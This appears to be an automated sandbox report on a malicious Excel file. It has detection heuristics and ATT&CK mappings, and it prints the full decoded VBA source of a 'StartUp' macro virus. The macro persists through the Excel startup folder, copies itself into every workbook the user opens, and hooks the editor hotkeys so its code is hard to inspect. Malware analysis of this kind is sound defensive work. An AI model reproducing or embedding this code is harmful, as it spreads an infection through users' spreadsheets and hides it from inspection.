Verdict: MALICIOUS (Risk Score 148)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
This Excel document contains VBA macros, including an Auto_Open macro, a common technique for running malware automatically when the document is opened. The macro copies its "StartUp" sheet into a new workbook saved in the Excel startup folder (Application.StartupPath) as 'StartUp.xls'; Excel opens every workbook in that folder on each launch, so this is a persistence mechanism. The macro also installs its own handlers for sheet activation and for the Alt+F11 and Alt+F8 keys, which hinders inspection of the macro code from the VBA editor and Macros dialog. ClamAV detections further confirm its malicious nature.
Heuristics (3)
- ClamAV: Xls.Trojan.Escape-2 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Escape-2
- VBA macros detected [medium], 1 related finding (OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Open macro [low] (OLE_VBA_AUTO): Auto_Open macro. Matched line in script: `Sub auto_open()`
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | Detection | Obfuscation or payload |
|---|---|---|---|---|---|
| macros.bas (SHA-256: 5a2e6e3fb5f8fa1d8972614657922017a409bc633a7e5cac8c87e2d94eed5b30) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3443 bytes | ClamAV: Xls.Trojan.Escape-1 | unlikely |
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "StartUp"
Sub auto_open()
    Dim i As Single
    On Error Resume Next
    If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
        Application.ScreenUpdating = False
        ThisWorkbook.Sheets("StartUp").Copy
        ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
        n$ = ActiveWorkbook.Name
        ActiveWindow.Visible = False
        Workbooks("StartUp.xls").Save
        'Workbooks(n$).Close (False)
    End If
    Application.OnSheetActivate = "StartUp.xls!ycop"
    Application.OnKey "%{F11}", "StartUp.xls!escape"
    Application.OnKey "%{F8}", "StartUp.xls!escape"
    Application.Calculation = xlCalculationManual
    ' On Error Resume Next
    ' On Error GoTo 0
    Worksheets("barcode").ComboBox2.Clear
    Worksheets("barcode").ComboBox2.AddItem "MDM20"
    Worksheets("barcode").ComboBox2.AddItem "MDQ70"
    Worksheets("barcode").ComboBox2.AddItem "MDM21"
    Worksheets("barcode").ComboBox2.AddItem "MDM20Z"
    Worksheets("barcode").ComboBox2.AddItem "MDT10"
    Worksheets("barcode").ComboBox2.AddItem "MDS90"
    Worksheets("barcode").ComboBox1.Clear
    Worksheets("barcode").ComboBox1.AddItem "新LOT"
    ' Worksheets("barcode").ComboBox3.Clear
    ' For i = 2 To Worksheets("sequence").[a65536].End(xlUp).Row
    '     Worksheets("barcode").ComboBox3.AddItem Worksheets("sequence").Cells(i, 1)
    ' Next i
    Dim MyArray(280, 3)
    ' The first list box contains three data columns
    Worksheets("barcode").ListBox1.ColumnCount = 3
    ' The second box contains six data columns
    For i = 0 To 280
        MyArray(i, 0) = Worksheets("全工程(ZPT)").Cells(i + 4, 8)
        MyArray(i, 1) = Worksheets("全工程(ZPT)").Cells(i + 4, 6)
        MyArray(i, 2) = Worksheets("全工程(ZPT)").Cells(i + 4, 7)
    Next i
    ' MyArray = Worksheets("全工程(ZPT)").Range("F4:H" & Worksheets("全工程(ZPT)").[a65536].End(xlUp).Row)
    ' MyArray = Worksheets("全工程(ZPT)").Range("f4:h9")
    Worksheets("barcode").ListBox1.List() = MyArray
    ' ListBox2.Column() = MyArray
    Rem arr = Worksheets("全工程(ZPT)").Range("F4:H" & Worksheets("全工程(ZPT)").[a65536].End(xlUp).Row)
    Rem ListBox1.AddItem Worksheets("全工程(ZPT)").Cells(i, 6)
End Sub

Sub ycop()
    On Error Resume Next
    If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
        Application.ScreenUpdating = False
        n$ = ActiveSheet.Name
        Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
        Sheets(n$).Select
    End If
End Sub

Sub escape()
    On Error Resume Next
    Application.OnSheetActivate = "StartUp.xls!back"
    Application.OnKey "%{F11}"
    Application.OnKey "%{F8}"
    Application.SendKeys "%{F11}"
    Application.SendKeys "%{F8}"
    For Each book In Workbooks
        Application.DisplayAlerts = False
        If book <> "StartUp.xls" Then book.Sheets("StartUp").Delete
    Next
    For Each book In Workbooks
        If book.Name = "StartUp.xls" Then
            book.Close
        End If
    Next
End Sub

Sub back()
    On Error Resume Next
    Application.OnKey "%{F8}", "StartUp.xls!escape"
    Application.OnKey "%{F11}", "StartUp.xls!escape"
    Application.OnSheetActivate = "StartUp.xls!ycop"
    Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!ycop"
    Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
```